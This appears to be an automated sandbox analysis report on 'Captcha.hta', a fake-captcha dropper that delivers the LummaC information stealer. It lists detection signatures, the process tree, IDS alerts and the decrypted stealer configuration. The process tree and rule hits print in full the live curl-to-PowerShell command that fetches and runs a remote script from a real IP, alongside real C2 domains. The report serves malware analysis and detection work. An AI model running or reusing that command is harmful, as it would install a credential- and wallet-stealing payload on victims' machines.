Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Captcha.hta

Overview

General Information

Sample name:Captcha.hta
Analysis ID:1578704
MD5:c8f045b16d3106cf269965b7fa2485dd
SHA1:c3e7306fe8290c38b656a6a671e5e889c37f63a5
SHA256:26eb8e2490888484e79cdd25b87257e5994a3ff084f0f9e54478f843a639c4e3
Tags:htauser-lontze7
Infos:

Detection

LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected HtmlPhish44
Yara detected LummaC Stealer
Yara detected obfuscated html page
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 1516 cmdline: mshta.exe "C:\Users\user\Desktop\Captcha.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 6812 cmdline: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 4008 cmdline: curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • powershell.exe (PID: 7100 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7376 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7416 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1090.tmp" "c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • RegAsm.exe (PID: 7432 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["necklacebudi.lat", "rapeflowwj.lat", "sustainskelet.lat", "aspecteirs.lat", "energyaffai.lat", "grannyejh.lat", "discokeyus.lat", "crosshuaht.lat"], "Build id": "DUkgLv--tax"}
SourceRuleDescriptionAuthorStrings
Captcha.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    Captcha.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          Process Memory Space: powershell.exe PID: 7100JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Process Memory Space: powershell.exe PID: 7100INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x1c734:$b2: ::FromBase64String(
            • 0x1c760:$b2: ::FromBase64String(
            • 0x1c78c:$b2: ::FromBase64String(
            • 0x1defd:$b2: ::FromBase64String(
            • 0x324d3:$s1: -join
            • 0x9aaa3:$s1: -join
            • 0xa7b78:$s1: -join
            • 0xaaf4a:$s1: -join
            • 0xab5fc:$s1: -join
            • 0xad0ed:$s1: -join
            • 0xaf2f3:$s1: -join
            • 0xafb1a:$s1: -join
            • 0xb038a:$s1: -join
            • 0xb0ac5:$s1: -join
            • 0xb0af7:$s1: -join
            • 0xb0b3f:$s1: -join
            • 0xb0b5e:$s1: -join
            • 0xb13ae:$s1: -join
            • 0xb152a:$s1: -join
            • 0xb15a2:$s1: -join
            • 0xb1635:$s1: -join
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 1516, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 6812, ProcessName: cmd.exe
              Source: Process startedAuthor: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 7100, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", ProcessId: 7376, ProcessName: csc.exe
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 1516, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 6812, ProcessName: cmd.exe
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7100, TargetFilename: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 7100, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", ProcessId: 7376, ProcessName: csc.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:18:05.860092+010020283713Unknown Traffic192.168.2.449736172.67.197.170443TCP
              2024-12-20T07:18:07.813883+010020283713Unknown Traffic192.168.2.449738172.67.197.170443TCP
              2024-12-20T07:18:10.149526+010020283713Unknown Traffic192.168.2.449739172.67.197.170443TCP
              2024-12-20T07:18:12.632007+010020283713Unknown Traffic192.168.2.449740172.67.197.170443TCP
              2024-12-20T07:18:14.764171+010020283713Unknown Traffic192.168.2.449741172.67.197.170443TCP
              2024-12-20T07:18:17.038616+010020283713Unknown Traffic192.168.2.449743172.67.197.170443TCP
              2024-12-20T07:18:19.432679+010020283713Unknown Traffic192.168.2.449745172.67.197.170443TCP
              2024-12-20T07:18:23.912824+010020283713Unknown Traffic192.168.2.449750172.67.197.170443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:18:06.583127+010020546531A Network Trojan was detected192.168.2.449736172.67.197.170443TCP
              2024-12-20T07:18:08.586491+010020546531A Network Trojan was detected192.168.2.449738172.67.197.170443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:18:06.583127+010020498361A Network Trojan was detected192.168.2.449736172.67.197.170443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:18:08.586491+010020498121A Network Trojan was detected192.168.2.449738172.67.197.170443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:18:05.860092+010020583611Domain Observed Used for C2 Detected192.168.2.449736172.67.197.170443TCP
              2024-12-20T07:18:07.813883+010020583611Domain Observed Used for C2 Detected192.168.2.449738172.67.197.170443TCP
              2024-12-20T07:18:10.149526+010020583611Domain Observed Used for C2 Detected192.168.2.449739172.67.197.170443TCP
              2024-12-20T07:18:12.632007+010020583611Domain Observed Used for C2 Detected192.168.2.449740172.67.197.170443TCP
              2024-12-20T07:18:14.764171+010020583611Domain Observed Used for C2 Detected192.168.2.449741172.67.197.170443TCP
              2024-12-20T07:18:17.038616+010020583611Domain Observed Used for C2 Detected192.168.2.449743172.67.197.170443TCP
              2024-12-20T07:18:19.432679+010020583611Domain Observed Used for C2 Detected192.168.2.449745172.67.197.170443TCP
              2024-12-20T07:18:23.912824+010020583611Domain Observed Used for C2 Detected192.168.2.449750172.67.197.170443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:18:04.143228+010020583601Domain Observed Used for C2 Detected192.168.2.4653071.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:18:03.910798+010020583641Domain Observed Used for C2 Detected192.168.2.4608151.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:18:17.801318+010020480941Malware Command and Control Activity Detected192.168.2.449743172.67.197.170443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:18:01.761536+010028593771A Network Trojan was detected192.168.2.449733147.45.44.13180TCP
              2024-12-20T07:18:02.605097+010028593771A Network Trojan was detected192.168.2.449733147.45.44.13180TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
              Source: 5.2.powershell.exe.525556c.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["necklacebudi.lat", "rapeflowwj.lat", "sustainskelet.lat", "aspecteirs.lat", "energyaffai.lat", "grannyejh.lat", "discokeyus.lat", "crosshuaht.lat"], "Build id": "DUkgLv--tax"}
              Source: Captcha.htaVirustotal: Detection: 19%Perma Link
              Source: Captcha.htaReversingLabs: Detection: 21%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dllJoe Sandbox ML: detected
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crosshuaht.lat
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sustainskelet.lat
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: aspecteirs.lat
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: energyaffai.lat
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: necklacebudi.lat
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: discokeyus.lat
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: DUkgLv--tax
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00415799 CryptUnprotectData,8_2_00415799

              Phishing

              barindex
              Source: Yara matchFile source: Captcha.hta, type: SAMPLE
              Source: Yara matchFile source: Captcha.hta, type: SAMPLE
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.pdb source: powershell.exe, 00000005.00000002.1737453939.0000000005224000.00000004.00000800.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]8_2_00423860
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], al8_2_0042DA53
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]8_2_0043ECA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax8_2_004096C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebp+00h], ax8_2_004096C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]8_2_0043C767
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]8_2_0040B70C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, eax8_2_00415799
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax8_2_00415799
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax8_2_0042984F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx8_2_00438810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh8_2_00438810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh8_2_00438810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then test eax, eax8_2_00438810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0041682D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]8_2_0041682D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]8_2_0041682D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], bp8_2_0041D83A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push C0BFD6CCh8_2_00423086
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push C0BFD6CCh8_2_00423086
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]8_2_0042B170
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]8_2_004179C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h8_2_0043B1D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax8_2_0043B1D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx8_2_004291DD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]8_2_004291DD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax8_2_00405990
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, eax8_2_00405990
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, esi8_2_00422190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebx], cx8_2_00422190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h8_2_00422190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0042CA49
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]8_2_00416263
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]8_2_00415220
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push esi8_2_00427AD3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0042CAD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebx], ax8_2_0041B2E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push ebx8_2_0043CA93
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx8_2_0041CB40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], cx8_2_0041CB40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00428B61
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0042CB11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0042CB22
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]8_2_0043F330
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax8_2_0040DBD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax8_2_0040DBD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]8_2_00417380
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h8_2_0041D380
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp al, 2Eh8_2_00426B95
